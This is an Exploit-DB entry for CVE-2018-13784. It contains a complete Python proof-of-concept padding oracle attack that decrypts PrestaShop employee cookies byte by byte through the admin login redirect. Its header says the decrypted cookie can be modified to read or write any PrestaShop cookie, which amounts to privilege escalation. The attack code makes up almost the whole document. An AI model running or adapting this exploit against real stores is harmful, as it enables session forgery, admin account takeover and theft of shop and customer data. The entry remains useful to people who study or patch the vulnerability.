EDB-ID: 45046 | Author: Charles Fol | Published: 2018-07-16 | CVE: CVE-2018-13784 | Type: Webapps | Platform: PHP | Aliases: N/A | Advisory/Source: Link | Tags: N/A | Vulnerable App: N/A | # PrestaShop <= 1.6.1.19 AES (Rijndael) / openssl_encrypt() Cookie Read
# Charles Fol
#
# See https://ambionics.io/blog/prestashop-privilege-escalation
#
# This POC will reveal the content of an employee's cookie.
# By modifying it one can read/write any PrestaShop cookie.
# It is a simple padding oracle implementation.
#
import requests
import urllib.parse
import base64
s = requests.Session()
"""
s.proxies = {
'http': 'localhost:8080',
'https': 'localhost:8080',
}
#"""
# Login as an employee, get your cookie and paste it here along with the URL
URL = "http://vmweb5/prestashop/admin177chuncw/"
cookie = "PrestaShop-b0ebb4f17b3e451202e5b044e29ed75d=20NxjuYuGVhSt8n0M54Av9Qkpyzl9axkK%2BGgLLCcv0MLQZhLAEV8lnq6U2Ew2n5aMUOYqkrkpqjputuLiBEqqW7pIce8cUv%2F3SEFp3tPnWfCgJgXKUsR1htOQ4KAoXyYLhoc31kVgcm39OhQh5Zg3A78HnO1On2udHwN8dTRdI86kewEFZPNtmMeBF7sAr9zezevsjK1VU4BI84EVXCYQuuhnVehoqfAa9XoZC%2FD3FEmDSuspZw2AUB0S7Py6ks6eEeCVDWieBKDsHD13UK%2FzgM%2F65m5rpU1P4BSQSHN2Qs%3D000208"
# Parse blocks and size
cookie_name, cookie_value = cookie.split("=")
cookie_value = urllib.parse.unquote(cookie_value)
cookie_size = cookie_value[-6:]
cookie_value = cookie_value[:-6]
cookie_value = base64.b64decode(cookie_value)
BLOCK_SIZE = 16
def test_padding(data):
"""Returns true if the padding is correct, false otherwise.
One can easily adapt it for customer cookies using:
index.php?controller=identity
"""
data = base64.b64encode(data).decode()
data = urllib.parse.quote(data)
data = data + cookie_size
s.cookies[cookie_name] = data
r = s.get(URL, allow_redirects=False)
s.cookies.clear()
return 'AdminLogin' not in r.headers.get('Location', '')
def e(msg):
print(msg)
exit(1)
if not test_padding(cookie_value):
e("Invalid cookie (1)")
elif test_padding(b"~~~~~"):
e("Invalid cookie (2)")
# Perform the padding oracle attack
result = b''
for b in range(1, len(cookie_value) // BLOCK_SIZE + 1):
obtained = []
current_block = cookie_value[(b ) * BLOCK_SIZE:][:BLOCK_SIZE]
precedent_block = cookie_value[(b - 1) * BLOCK_SIZE:][:BLOCK_SIZE]
for p in range(BLOCK_SIZE):
nb_obtained = len(obtained)
for i in range(256):
pad = nb_obtained + 1
prelude = (
b"\x00" * (BLOCK_SIZE - pad) +
bytes([i]) +
bytes([o ^ pad for o in obtained][::-1])
)
data = cookie_value + prelude + current_block
if test_padding(data):
print("Got byte #%d of block #%d: %d" % (p, b, i))
obtained.append(i ^ pad)
break
else:
e("Unable to decode position %d" % p)
# Compute the contents of the plaintext block
result += bytes([o ^ p for p, o in zip(precedent_block, obtained[::-1])])
try:
print("COOKIE: %s" % result.decode())
except UnicodeDecodeError:
print("COOKIE: Unable to decode, wait for next block")
